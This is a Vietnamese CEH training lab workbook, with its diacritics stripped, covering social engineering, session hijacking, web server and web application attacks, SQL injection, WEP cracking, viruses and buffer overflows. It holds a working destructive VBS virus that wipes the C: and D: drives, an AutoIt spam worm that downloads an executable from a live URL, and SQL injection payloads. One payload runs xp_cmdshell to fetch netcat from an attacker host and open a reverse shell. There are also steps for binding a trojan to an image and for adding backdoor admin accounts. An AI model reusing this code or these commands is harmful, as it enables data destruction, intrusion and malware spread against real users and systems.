Upload File

ceh lab book_tieng_viet_phan3

Download Ceh lab book_tieng_viet_phan3

If you can't read please download the document

Upload: eragon226

Post on 19-Nov-2014

1.674 views

Category:

Documents


5 download

Report

DESCRIPTION

 

TRANSCRIPT

  • 1. Gio trnh bi tp C|EH Ti liu dnh cho hc vinBi 7:Social EngineeringI/ Gii Thiu K thut la o (Social Engineering) l mt th thut c nhiu hacker s dng chocc cuc thm nhp vo cc h thng mng, my tnh. y l mt trong nhng phng thchiu qu nh cp mt khu, thng tin, tn cng vo h thng. Di y l cu chuyn c tht v mt trong nhng hacker ni ting nht th giitrong vi nm tr li y - Kevin Mitnick (M, tng b 8 nm t v ti tn cng vo h thngmy tnh), chuyn gia hng u v k thut Social Engineering. Ln k hoch tn cng vocng ty X, Kevin vn dng k nng ny d tm thng tin lin quan n ng tng gim cv mt tr l ca ng ny. Li dng lc hai ngi i cng tc, anh ta s dng Call ID gi,nhi ging ni ca vin tr l gi n qun tr mng cng ty, yu cu gi mt khu ngnhp vo h thng ca tng gim c v ngi qun mt khu. Qun tr vin kim tra mtvi thng tin v "vin tr l", nhng Kevin c thng tin v s khn ngoan tr li. Ktqu l Kevin ly c mt khu v kim sot ton b h thng mng ca cng ty X.Mt hnh thc la o khc: Mt ngy... xu tri no , bn nhn c in thoi,u dy bn kia l mt ging ni ngt ngo: "Cho anh, dch v m anh ang s dng ticng ty chng ti hin ang b trc trc vi account (ti khon) ca anh. ngh anh gi gpthng tin v ti khon cho chng ti iu chnh li". Mi nghe qua tng nh y l mtkiu la th thin, nhng xc sut thnh cng rt cao, c bit khi ging ni d thng nhmy c trc tng i 1080! Phng cch la o tng t l dng k thut "Fake EmailLogin". V nguyn tc, mi khi ng nhp vo hp th th chng ta phi in thng tin tikhon gm username v password ri gi thng tin n mail server x l. Li dng iuny, hacker thit k cc trang ng nhp gi (Fake Login) cc thng tin c gi ncho h.Tm li, k thut Social Engineering rt a dng, phong ph v cng ht sc nguyhim do tnh hiu qu v s ph bin. K thut ny khng i hi phi s dng qu nhiu yut k thut, thm ch khng c lin quan n k thut thun ty (non-technical). Hacker c ththc hin phng cch ny thng qua th tn, e-mail, in thoi, tip xc trc tip, thng quangi quen, cc mi quan h c nhn... nhm dn d, khai thc cc thng tin do v tnh b titl t pha ngi dng. VN, k thut ny cn kh mi nn khng him trng hp b nhla mt cch d dng. Chng hn nm ngoi, hng lot game th MU Global mt schsnh sanh ti sn (o), khi ngy th in thng tin ti khon ca mnh vo mt e-mail gi moadmin MU ca hacker!(Trch dn)II/ Cc bi Lab:Bi Lab 1: Gi email nc nh km TrojanVSIC Education Corporation Trang 74

2. Gio trnh bi tp C|EH Ti liu dnh cho hc vin thc hin bi Lab ny, ta s dng chng trnh Mini-binder ghp file trojan vihnh nh, thay i icon v chng trnh Outlook gi email nc danh.Ghp file hnh nh v file trojan, u tin ta to 1 file trojan, ly 1 file nh v file icobt k ghp.Ta s dng lnh MMB 60.ico svchost.exe cathu.jpg trojanhao.exe ghp file trojan svchost.exe vi cathu.jpg v vi icon l 60.ico.Tip theo, ta nn file trojan mi bng Winrar li nhiu ln trnh chng trnh Anti-virus(ty theo phin bn Anti-virus, tuy nhin hu ht cc trojan khng qua mt c ccchng trnh ny) v thay i thng tin ca outlook.VSIC Education Corporation Trang 75 3. Gio trnh bi tp C|EHTi liu dnh cho hc vin Ta vo Tool Option Mail setup View AccountChn Account cn thay i vthay i thng tin Your Name v E-mail Address. Tip theo Attach file nh km vo v gi Email i. Trong bi Tc gi gi ti a chemail [email protected], v sau check mail kim tra th xem mail n cha.VSIC Education CorporationTrang 76 4. Gio trnh bi tp C|EH Ti liu dnh cho hc vinBi 8: Session HijackingI/ Gii thiu:Nh ta bit v sniffer (nghe ln trong mng), Hacker c th ly bt k thng tin gkhng c m ha, hay c th fake CA c th ly thng tin trong giao thc HTTPS, bygi ta c thm 1 k thut na l session hijacking. thc hin c bi lab ny trc tin taphi s dng ARP spoof, sau s dng phn mm T-sight hay Hunt ginh ly session tpha my nn nhn.II/ Thc hin bi Lab Trong bi Lab, tc gi s dng Vmware thc hin, s dng my th nghipTELNET v SSH. Cn 2 my cn li 1 s dng Window 2000( ci sn tool T-sight) v 1 sLinux test SSH.Vic ci t phn mm kh d dng, bn cn phi thm phn driver v chuyn v IP192.168.200.0/24 do ang s dng bn Trial.VSIC Education Corporation Trang 77 5. Gio trnh bi tp C|EHTi liu dnh cho hc vin Sau khi ci t xong, trn my 192.168.200.1 thit lp cho php cc my khc telnet.V t my 192.168.200.2 telnet n my 192.168.200.1. V d liu thu c t my 192.168.200.2, s dng tnh nng Take Over trong ToolT-sight ly session.VSIC Education CorporationTrang 78 6. Gio trnh bi tp C|EH Ti liu dnh cho hc vinSau khi Session b ly, session t my Telnet s b Lost connection v ngi sdng trong trng hp ny khng bit l mnh b Lost Connection bi nguyn nhn no.By gi ta bt Service SSH ca my Linux bng lnh Service sshd v test th sessionhijacking i vi traffic ssh.VSIC Education Corporation Trang 79 7. Gio trnh bi tp C|EH Ti liu dnh cho hc vinBi 9: Hacking Web ServerI/ Gii thiu: Thng thng Hacking 1 Web Server, Hacker thng phi xem th Web Serverang chy h iu hnh g v chy nhng sercice g trn , h iu hnh thng thng l cch iu hnh Win 2000 Server, Win 2003 Server, Redhat.v.v. Cc Service bao gm Apache,IIS, FTP Server v.v. Nu nh 1 trong nhng Service ca H iu hnh b li hay service khcb li c th dn ti vic mt quyn kim sot ca h thng. Trong bi thc hnh ca phnny, tc gi gii thiu li ca h iu hnh l DCOM v li ng dng khc l Server-U,Apache(FTP Server). T nhng li ny, ta c th kim sot hon ton my nn nhn.II/ Thc Hin bi lab. Bi Lab 1: Tn cng Web Server Win 2003(li Apache) bit c my Server ca h thng c b li hay khng, ta s dng dng phn mmqut kim tra. (Phn ny c hc trong scaning).VSIC Education Corporation Trang 80 8. Gio trnh bi tp C|EHTi liu dnh cho hc vinRankVulnerability Name Count1.echo service 12.ASN.1 Vulnerability Could Allow Code Execution 13.Windows Cumulative Patch 835732 Remote 14.Null Session 15.No Remote Registry Access Available16.telnet service 17.DCOM Enabled 18.Windows RPC Cumulative Patch 828741 Remote 19.Windows RPC DCOM interface buffer overflow 110. Windows RPC DCOM multiple vulnerabilities111. Apache 1.3.27 0x1A Character Logging DoS 112. Apache 1.3.27 HTDigest Command Execution 113. Apache mod_alias and mod_rewrite Buffer Overflow 114. ApacheBench multiple buffer overflows115. HTTP TRACE method supported1Ta khng thy thng tin v FTP Server y, do phn mm Retina ch c tnh nngnhn din cc Service ca Microsoft v nhng Service thng dng. Cn cc Service khngthng dng hn th phn mm ch thy di dng m port. Trong trng hp ny ta thy mport 21. Ta s dng Metasploit khai thc li Apache v ly c (Console).VSIC Education CorporationTrang 81 9. Gio trnh bi tp C|EHTi liu dnh cho hc vinBy gi chng ta s tm cch Remote Desktop vo my 192.168.200.1. Trc tin tato 1 user v add user ny vo nhm admin bng s dng lnh. Net user vsichao vsichao /add //thm user Net Localgroup Administrators vsichao /add //a user vo nhm Admin Ta c th kim ta li bng lnh Net user kim tra th user ca mnh cquyn admin hay cha. Tip theo ta th remote Desktop vo my bng lnh mstsc /v 192.168.200.6 . Nukhng c ta s dng file Openrdp.vbs m Remote Desktop. Ta s dng chng trnhCisco TFTP Server y file ny Server nn nhn. S dng lnh tftp my nn nhn ly fileVSIC Education CorporationTrang 82 10. Gio trnh bi tp C|EH Ti liu dnh cho hc vin Add user vo v nng quyn ln Administrator. Remote Desktop vo vi user l cehclass thnh cng, nh vy ta hon ton kimsot c my nn nhn.VSIC Education Corporation Trang 83 11. Gio trnh bi tp C|EH Ti liu dnh cho hc vinBi lab 2: Khai thc li ng dng Server U Tng t nh bi trn, ta s dng chng trinh nmap xc nh version ca ServerUv s dng metaesploit tn cng.VSIC Education Corporation Trang 84 12. Gio trnh bi tp C|EHTi liu dnh cho hc vinBi 10: WEB APPLICATION HACKINGI/ Gii thiu:ng dng Web thng thng s dng d liu u vo trong cc truy cp HTTP (hoctrong cc tp tin) nhm xc nh kt qu phn hi. Tin tc c th sa i bt k phn no camt truy xut HTTP, bao gm URL, querystring, headers, cookies, form fields, v thm chfield n (hidden fields), nhm vt qua cc c ch bo mt. Cc tn cng ph bin dng nybao gm: - Chy lnh h thng ty chn - Cross site scripting - Li trn b m - Tn cng Format string - SQL injection - Cookie poisoning - Sa i field nTrong bi thc hnh ny, ta th khai thc cc l hng Cross Site Cripting, Formatstring, Cookie Manipulation, Authorization Failure.II/ Cc Bi LabBi Lab 1: Cross Site Scripting u tin ta login vo bng username jv v password jv789 v chn chc nngpost message. Sau ta post script vo phn message text.VSIC Education CorporationTrang 85 13. Gio trnh bi tp C|EH Ti liu dnh cho hc vin Sau ta submit post script ny ln. Ta s dng F5 Refresh li trnh duyt vthy xut hin.Lc ny trnh duyt ca nn nhn v tnh thc hin script c user post ln Server.Da vo script ny, tin tc c th n cp cookie ca nn nhn v log in vo h thng.Bi Lab 2: Insufficient Data Validation Trong bi Lab ny khi chuyn tin t ti khon ny sang ti sn khc, tham s amoutlun lun phi ln hn 0. Tuy nhin trong 1 s trng hp Hacker c th thay i con s nyl s m bng nhng chng trnh http proxy. Kt qu ny c th gy hi n cc khon tichnh ca ngn hng HackmeBank. Ta th chuyn vi gi tr Amout 100 t ti khon bt k sang ti khon khc Kt qu thnh cng. Ta tip tc chuyn thm 1 ln na nhng vi gi tr l -100. Tuynhin do c kim tra di pha client nn vic chuyn tin khng thnh cng.VSIC Education Corporation Trang 86 14. Gio trnh bi tp C|EH Ti liu dnh cho hc vinBy gi ta s dng chng trnh Webscarab lm http proxy v thay i thng s cPOST ln Server. Kt qu tr v t Server vic chuyn tin vn thnh cngVSIC Education Corporation Trang 87 15. Gio trnh bi tp C|EHTi liu dnh cho hc vin Ta kim tra trong Transaction thy c lu li vic chuyn tin.Bi Lab 3: Cookie Manipulation Trong lc login, ta xem trong Cookie c tham s CookieloginAttempts, tham s nydng lock session khi ai c gng login vo khi nhp sai hay khng bit password. Thams ny m t 5 n 0. Khi tham s ny bng 0 l lc session b Lock. Ta c th s dngWebscarab thay i tham s ny trnh vic Server lock session.VSIC Education CorporationTrang 88 16. Gio trnh bi tp C|EH Ti liu dnh cho hc vinBi Lab 4: Authorization Failure u tin ta vo xem cc account ca user jc password jc789.Ta thy account Number l 5204320422040005, 5204320422040006, 5204320422040007, 5204320422040008. User jc ch qun l c cc account thng s trn. Tuynhin ta ch n phn URL khi s dng tnh nng View Transaction.VSIC Education Corporation Trang 89 17. Gio trnh bi tp C|EH Ti liu dnh cho hc vin Ta thay thng s 5204320422040005 bng thng s 5204320422040004(thng s nykhng thuc account qun l ca user jc). Nh vy web site ang b li phn quyn.VSIC Education Corporation Trang 90 18. Gio trnh bi tp C|EHTi liu dnh cho hc vinBi 11: SQL INJECTIONI/ Gii thiu v SQL Injection:y l K thut tn cng ny li dng nhng l hng trn ng dng(khng kim tra knhng k t nhp t ngi dng). Thc hin bng cch thm cc m vo cc cu lnh hay cutruy vn SQL (thng qua nhng textbox) trc khi chuyn cho ng dng web x l, Server sthc hin v tr v cho trnh duyt (kt qu cu truy vn hay nhng thng bo li) nh mcc tin tc c th thu thp d liu, chy lnh (trong 1 s trng hp) v sau cho c th chimc quyn kim sot ca h thng. Sau y l 1 s th thut cn bn 1) Ly tn table v column hin hnh:Structure:Login page (or any injection page)::::username:having 1=1--KQ: -------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column VICTIM.ID is invalid in theselect list because it is not contained in an aggregate function and there is no GROUP BYclause.------------------------------------------> Ta c c TABLE VICTIMTip tcusername:group by VICTIM.ID having 1=1--KQ:---------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column VICTIM.Vuser is invalid in theselect list because it is not contained in either an aggregate function or the GROUP BYclause.-------------------------------------------Vy l ta c column VuserUNION nh m hiu quVng tha cc bn, ta c th dng n ly c gn nh mi th .Trc ht ti xin ni s qua ci Structure ca n:Login page::::username:Union select [column] from [table] where [column2=...]--password: everythingVd: Gi s ta bit 2 column username v password trong table VTABLE cua db victim lVUSER v VPASS th ta lm nh sauVSIC Education CorporationTrang 91 19. Gio trnh bi tp C|EHTi liu dnh cho hc vinusername:Union select VPASS from VTABLE where VUSER=admin-- (1)password: everything(1): Trong trng hp ny admin l mt user m bn bit nu khng c th b trng, n scho bn user u tinKQ:-----------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statementcontaining a UNION operator must have an equal number of expressions in their target lists.---------------------------------Nu KQ ra nh trn c ngha l bn phi union thm nhiu column na tt c column catable VTABLE c Union ht. Structure ca n nh sau:username:Union select VPASS,1,1,1...1,1 from VTABLE where VUSER=admin-- (1)password: everythingBn hy thm ",1" cho n khi kt qu ra i loi nh--------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarcharvalue tuibihackroi to a column of data type int.--------------------------------Nh vy Pass ca user admin l tuibihackroi2) Ly ht value ca mt column bit trong mt table bitB quyt y l Not in Structure ca n nh sau (s dng v d vi column ca bi trc):Vi Vuser l admin ta c th ly c cc user khc-----Login Page::::::username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)-------------------------Sau chng ta s thu c thm mt user na v ch vic chn vo trong Not in (vd: Not in(admin,hacker,.)) c lm tip tc nh th ta s c ht mi user(d nhin sau l mipassword).**** ly danh sch tn cc user theo mt quy nh m bn chn, v d chi ly cc user ccha t admin chng hn ta dng like: cu trc-----Login Page::::::username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) like%admin%-------------------------3) Ly ht table v column ca ca database:B quyt chnh l table ny ca database: INFORMATION_SCHEMA.TABLES vi columnVSIC Education CorporationTrang 92 20. Gio trnh bi tp C|EHTi liu dnh cho hc vinTABLE_NAME (cha ton b table) v table: INFORMATION_SCHEMA.COLUMNS vicolumn COLUMN_NAME (cha ton b column)Cch s dng dng Union:-----Login page:::::::username: UNION SELECT TABLE_NAME,1,1,1,1 FROMINFORMATION_SCHEMA.TABLES WHERE .---------------------------Nh vy ta c th ly c ht table, sau khi c table ta ly ht column ca table :-----Login page:::::::username: UNION SELECT COLUMN_NAME FROMINFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and ---------------------------Trn y l nhng iu cn bn nht v SQl injection m ti c th cung cp cho cc bn, cnlm c tt hay khng th phi c mt cht sng to na hy vng n gip ch cho cc bnmt cht khi gp mt site b SQl injection4)Khng s dng UNION:Nu cc bn ngi dng Union v nhng bt tin ca n th cc bn c th dng "Convert" mtcch d dng hn thu thp info qua cc thng bo liStructure:---login page::::user:+ convert (int,(select @@version))---------------------------Trn l mt v d bn ly version, gi y mun ly bt c info no bn ch cn thay voci "select @@version" nhng nh nu l ln u tin get info th thm TOP 1 vo nhvd: user:+ convert (int,(select Vpass from Vtable where Vuser=admin))--Lu : Nu cc bn s dng khng c th c th v du + khng c chp nhn, lc hy thay n === %2bvd: user:%2b convert (int,(select Vpass from Vtable where Vuser=admin))--5) Run command SQL: run command bn c th dng du ";"Structure:VSIC Education Corporation Trang 93 21. Gio trnh bi tp C|EH Ti liu dnh cho hc vinlogin page:::::user: ; [command]-------------------------------vd: ; DROP TABLE VTABLE--II/ Thc Hnh Bi Lab Trong bi ny Hacker (my 192.168.1.44) s thng qua Port Web tn cng voServer 2000(192.168.1.46) v s upload ln Server 2000 trojan webbase, sau kim sotServer ny. u tin s dng phn mm Acunetix qut xem Server Web c b li ng dng gkhng??VSIC Education Corporation Trang 94 22. Gio trnh bi tp C|EHTi liu dnh cho hc vin Ta c th test bng tay trong tnh hung ny bng cch thm du trong formlogin. Sau y l 1 s on m ly thng tin v Server khi bit Server b li SQL.1/lay ten Server nameand 1=convert(int,@@servername)--sp_password2/lay database nameand 1=convert(int,db_name())--sp_password3/kiem tra system userand 1=convert(int,system_user)--sp_passwordVSIC Education CorporationTrang 95 23. Gio trnh bi tp C|EH Ti liu dnh cho hc vin4/and 1=convert(int,@@version)--sp_password5/Lay thong tin table userinfo having 1=1-- (xem table hien hanh) group by userinfo.username having 1=1-- (xem column tiep theo) Sau khi ly thng tin v Server, Hacker th upload ln Server trojan netcat bng cchs dng gi hm shell trong SQL v tftp. Ta nh vo form login cu lnh sau(phi nh lmy client s dng TFTP Server):;exec master..xp_cmdshell "tftp -i 192.168.1.44 get nc123.exe";-- Cu lnh ny c thc thi h thng Server thng qua SQL, n s load nc123.exe tTFTP Server 192.168.1.44. Ta kim tra trn TFTP Server file c gi hay cha.Sau khi upload thnh cng trojan netcat, vic by gi l ta phi chy n v s dngtelnet ngc ra bn ngoi. V lc ny chng ta ang ng sau Firewall nn khng th lngnghe trn port v client ngoi Firewall khng th connect vo c. Chy lng nghe pha ClientVSIC Education Corporation Trang 96 24. Gio trnh bi tp C|EH Ti liu dnh cho hc vin Telnet net ngc ra ngoi t Server. V kt ni netcat c hnh thnh sau khi telnet ngc ra t Server, lc ny chng ta by pass c Firewall.VSIC Education Corporation Trang 97 25. Gio trnh bi tp C|EHTi liu dnh cho hc vin Sau khi kt ni c mn hnh console ca Window, ta tip tc upload thm 1 trojandi dng web thng qua TFTP.Trojan web m chng ta s dng l zehir4.asp, y l trojan kh nhiu tin dng. Ttrojan ny ta c th thc hin d dng vic xa Database, vic download cc file t Server2000 v my ca mnh thng qua Port WebVSIC Education CorporationTrang 98 26. Gio trnh bi tp C|EH Ti liu dnh cho hc vinLy databaseThay i hnh nn ca trang web(deface)VSIC Education Corporation Trang 99 27. Gio trnh bi tp C|EH Ti liu dnh cho hc vin Tm li li SQL Injection khng nhng gip Hacker c nhiu thng tin v table,column m c th cho php Hacker s dng nhng lnh thc thi h thng(trong 1 s trnghp) v c th upload trojan vo h thng Server.VSIC Education Corporation Trang 100 28. Gio trnh bi tp C|EH Ti liu dnh cho hc vinBi 12: WIRELESS HACKINGI/ Gii ThiuMt s im yu ca mng khng dyChun IEEE 802.11 a ra mt WEP (Wired Equivalent Privacy) bo v s truyn phtkhng dy. WEP c s dng mt chui s 0 i xng m ha cc ngi dng trongmng khng dy. 802.11 a ra cc kha WEP 64 bit nhng c cung cp thm kha WEP128 bit. 802.11 khng a ra cc kha c xp xp nh th no. Mt WEP bao gm 2 phn:vector khi to (IV) 24 bit v key mt. IV c pht trong plain text phn header ca ccgi 802.11. Tuy nhin n rt d b crack. V vy gii php tip theo l phi s dng cckha WEP ng m c th thay i mt cch thng xuyn.Chun 802.11 xc nhn cc my khch s dng kha WEP. Tip sau chun cng nghip c a ra thng qua xc nhn 802.1x b sung cho cc thiu xt ca chun 802.11 trcn. Tuy nhin gn y, trng i hc Maryland minh chng bng ti liu v s c ca vn bo mt tim n vi giao thc 802.1x ny. Gii php ngy nay l s dng s xc nhn lnnhau ngn cn ai gia tn cng v cc kha WEP ng, cc kha ny c xp xpmt cch cn thn v cc knh m ha. C hai k thut ny c h tr bi giao thc (TLS:Transport Layer Security). Ni bt hn c l vic kha per-packet v kim tra tnh ton vnca message. y chnh l chun bo mt 802.11i.II/ Thc hnh bi Lab: thc hnh bi lab Crack Wep key, chng ta phi c Card mng h tr vic thu ccpacket v gi nhng gi de-authen ngc li Access-point, ng thi phin bn Linux hayWindow phi h tr vic kt ni n driver ca Card mng wifi. Trong khun kh thc hnhbi Crack Wep key, do s dng Card Wifi khng h tr tnh nng gi gi de-authen, arp naccess point, tc gi c gng to ra traffic c th thu packet sau tnh ton ra cWEP key(vic tnh ton ph thuc vo Packet nhn c t Access-point). Trc tin ta phi ti chng trnh Crack t http://www.aircrack-ng.org/, trong phnmm ny, ta s dng airdump thu packet, aircrack b kha WEP Key. Tip theo ta download driver cho Card mng(khng phi driver ca chnh hng vdriver c vit ring), y tc gi s dng Card Wifi NetGear WG511T.www.wildpackets.com/support/hardware/atheros30_driver. i vi Cisco Aironet ta cngdownload driver t trang web ny. Sau ta tin hnh ci t cho Card Wifi.VSIC Education Corporation Trang 101 29. Gio trnh bi tp C|EH Ti liu dnh cho hc vin Tip theo ta s dng Airdump thu packet t Access Point. Ta chn loi Card l Atheros, Channel l 6 v output file l hack.ivs.VSIC Education Corporation Trang 102 30. Gio trnh bi tp C|EHTi liu dnh cho hc vin Ta gi lp traffic bng cch chp 1 d liu ln chy thng qua Access-Point. i vicard mng h tr ta hon ton c th ch ng vic ny. V lc ny ta thy s lng packet nhn c t card mng wifi rt nhanh. Ta ikhong 20 pht(i vi WEP key 64 bit) cho n khi packet khong t 200 000 n 300 000v s dng Airdump ly WEP key.VSIC Education CorporationTrang 103 31. Gio trnh bi tp C|EHTi liu dnh cho hc vin Ta c th thy c WEP c tm thy l Athen. Tng t nh vy i vi WEPkey 128 bit, nhng thi gian ch s lu hn. WEP key 128 bitVSIC Education CorporationTrang 104 32. Gio trnh bi tp C|EHTi liu dnh cho hc vinBi 13: VIRUSI/ Gii thiu: (tham kho bi c thm)II/ Thc hnh Lab:Bi 1: Virus ph hy d liu my Ta c th vit d dng 1 virus ph hy my bng nhng hm Format hay deletetrong ngn ng VBS nh sau:msgbox"Error !"On Error Resume NextSet vip_xinh = Createobject("scripting.filesystemobject")vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0)& " vip_xinh.vbs"Set vip_xinh2= CreateObject("WScript.Shell")vip_xinh2.regwrite"HKLMSOFTWAREMicrosoftWindowsCurrentVersionRundie","wscript.exe "&vip_xinh.GetSpecialFolder(0)& " vip_xinh.vbs %"On Error Resume NextConst vic = "D:"DelvicSub Delvic()Dim fsoSet fso = CreateObject("Scripting.FileSystemObject")fso.DeleteFile vic & "*.*", Truefso.DeleteFolder vic & "*", TrueEnd SubOn Error Resume NextConst vic1 = "C:windows"Delvic1Sub Delvic1()Dim fso1Set fso1 = CreateObject("Scripting.FileSystemObject")fso1.DeleteFile vic1 & "*.*", Truefso1.DeleteFolder vic1 & "*", TrueEnd SubOn Error Resume NextConst vic2 = "C:"VSIC Education CorporationTrang 105 33. Gio trnh bi tp C|EH Ti liu dnh cho hc vinDelvic2Sub Delvic2()Dim fso2Set fso2 = CreateObject("Scripting.FileSystemObject")fso2.DeleteFile vic2 & "*.*", Truefso2.DeleteFolder vic2 & "*", TrueEnd SubOn Error Resume NextSet treomay= CreateObject("WScript.Shell")Dotreomay.run "notepad",falseloop y ta thc hin vng lp nhiu ln v xa nhng thng tin trn C v D, cc bnc save on Script ny thnh file vbs v sau chy on script ny. Lc ny ta m rt nhiu chng trnh notepad.exe v my s b li.VSIC Education Corporation Trang 106 34. Gio trnh bi tp C|EH Ti liu dnh cho hc vin Ta khi ng li my bng cch s dng reset nhng do thng tin C b xa nnmy tnh s khng khi ng li c, nh vy my tnh nhim virus b ph hy hon ton.Bi 2: Virus gaixinh ly qua tin nhn.Ta phn tch code c vit bng AUTO IT nh sau; ; ----------------------------------------------------------------------------; ; ----------------------------------------------------------------------------;--------------------------------------------; Tac Gia: Kevin Duong - KVD; Phan Mem: DKC Bot; Phien Ban: 1.1; Cong Dung: Quang cao Website thong qua Y!M; Phat Hanh: 1-9-2006;--------------------------------------------; Thiet Lap#NoTrayIcon$website = "http://daokhuc.be"; Lay Nhiem Vao He ThongIf Not FileExists(@WindowsDir & "taskmng.exe") ThenInetGet ($website & "/dkc.exe", @WindowsDir & "taskmng.exe", 0, 1)Sleep(5000)EndIf; Ghi Khoa RegistryRegWrite("HKEY_CURRENT_USERSoftwarePoliciesMicr osoftInternetExplorerControl Panel", "Homepage", "REG_DWORD", "1")RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableTaskMgr", "REG_DWORD", "1")RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableRegistryTools", "REG_DWORD", "1")RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftInt ernet ExplorerMain", "StartPage", "REG_SZ", $website)RegWrite("HKEY_CURRENT_USERSoftwareYahoopagerV iewYMSGR_buzz","content url", "REG_SZ", $website)VSIC Education Corporation Trang 107 35. Gio trnh bi tp C|EHTi liu dnh cho hc vinRegWrite("HKEY_CURRENT_USERSoftwareYahoopagerV iewYMSGR_Launchcast","content url", "REG_SZ", $website)RegWrite("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun", "Task Manager", "REG_SZ", @WindowsDir &"taskmng.exe")RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftInt ernet ExplorerMain","Window Title", "REG_SZ", "Dao Khuc Community:: Chut gi de nho..."); Danh Sach Tin Nhan Ngau NhienDim $tin[10]$tin[0] = "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao veem duoc nhu long em luon uoc mo, giac mo giau sang... " & $website & " "$tin[1] = "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voianh quay quang... " & $website & " "$tin[2] = "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau baoky niem... " & $website & " "$tin[3] = "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay veday, loi nao anh noi da quen... " & $website & " "$tin[4] = "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, choquen mau cau yeu thuong em voi anh hom nao... " & $website & " "$tin[5] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra laiem niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $website &""$tin[6] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da dennhu la giac mo roi ra di cho anh bat ngo... " & $website & " "$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoilac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $website & " "$tin[8] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieuyeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $website & " "$tin[9] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khibao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " & $website & " "; Ham Thay Doi Status & Gui Tin NhanWhile (1)sleep(60000)$tieude = WinGetTitle("Yahoo! Messenger", "")$kiemtra = WinExists ($tieude)If $kiemtra = 1 Then$ngaunhien = Random(0,9,1)ClipPut($tin[$ngaunhien])BlockInput (1)WinActivate($tieude)Send("!m")Send("un")VSIC Education CorporationTrang 108 36. Gio trnh bi tp C|EHTi liu dnh cho hc vinSend("^v {ENTER}{ENTER}")Send("^m")Send("{DOWN}")Send("^{SHIFTDOWN}{END}{SHIFTUP}")Send("{ENTER}")Send("^v {ENTER}")BlockInput (0)EndIfSleep(1800000)WEnd; ----------------------------------------------------------------------------; ; ---------------------------------------------------------------------------- Da vo on code ny, ta c th edit li theo ca mnh, sau s dng tool AutoIT chuyn script ny sang file.exe v thc thi.Sau chy file exe v login vo Yahoo kim tra, ta thy tin nhn gi rt nhiu, nu nhchng ta set tham s sleep cng b (khong 3000) th lu lng gi rt l nhanh v nhiu.VSIC Education CorporationTrang 109 37. Gio trnh bi tp C|EH Ti liu dnh cho hc vin c th ly c qua tin nhn, chng ta phi nh km virus vo website, hay bngcch no my nn nhn chy file exe va c to ra.VSIC Education Corporation Trang 110 38. Gio trnh bi tp C|EH Ti liu dnh cho hc vinBi 14:BUFFER OVERFLOWI/ L thuytTrong cc lnh vc an ninh my tnh v lp trnh, mt li trn b nh m hay gi tt l litrn b m l mt li lp trnh c th gy ra mt ngoi l truy nhp b nh my tnh vchng trnh b kt thc, hoc khi ngi dng c ph hoi, h c th li dng li ny phv an ninh h thng.Li trn b m l mt iu kin bt thng khi mt tin trnh lu d liu vt ra ngoi binca mt b nh m c chiu di c nh. Kt qu l d liu s ln cc v tr b nh link. D liu b ghi c th bao gm cc b nh m khc, cc bin v d liu iu khinlung chy ca chng trnh (program flow control).Cc li trn b m c th lm cho mt tin trnh v hoc cho ra cc kt qu sai. Cc liny c th c kch hot bi cc d liu vo c thit k c bit thc thi cc on mph hoi hoc lm cho chng trnh hot ng mt cch khng nh mong i. Bng cch, cc li trn b m gy ra nhiu l hng bo mt (vulnerability) i vi phn mm v toc s cho nhiu th thut khai thc (exploit). Vic kim tra bin (bounds checking) y bilp trnh vin hoc trnh bin dch c th ngn chn cc li trn b m.M t k thutMt li trn b nh m xy ra khi d liu c vit vo mt b nh m, m do khng kimtra bin y nn ghi ln vng b nh lin k v lm hng cc gi tr d liu ti cca ch b nh k vi vng b nh m . Hin tng ny hay xy ra nht khi sao chp mtxu k t t mt b nh m ny sang mt vng b nh m khc.V d c bnTrong v d sau, mt chng trnh nh ngha hai phn t d liu k nhau trong b nh: Al mt b nh m xu k t di 8 bytes, v B l mt s nguyn kch thc 2 byte. Ban u,A ch cha ton cc byte gi tr 0, cn B cha gi tr 3. Cc k t c kch thc 1 byte.By gi, chng trnh ghi mt xu k t "excessive" vo b m A, theo sau l mt byte 0 nh du kt thc xu. V khng kim tra di xu, nn xu k t mi ln gi tr caB:VSIC Education Corporation Trang 111 39. Gio trnh bi tp C|EHTi liu dnh cho hc vinTuy lp trnh vin khng c nh sa i B, nhng gi tr ca B b thay th bi mt sc to nn t phn cui ca xu k t. Trong v d ny, trn mt h thng big-endian sdng m ASCII, k t "e" v tip theo l mt byte 0 s tr thnh s 25856.Nu B l phn t d liu duy nht cn li trong s cc bin c chng trnh nh ngha,vic vit mt xu k t di hn na v vt qu phn cui ca B s c th gy ra mt lichng hn nh segmentation fault (li phn on) v tin trnh s kt thc.Trn b nh m trn stackBn cch vic sa i cc bin khng lin quan, hin tng trn b m cn thng b lidng (khai thc) bi tin tc lm cho mt chng trnh ang chy thc thi mt on m ty c cung cp. Cc k thut mt tin tc 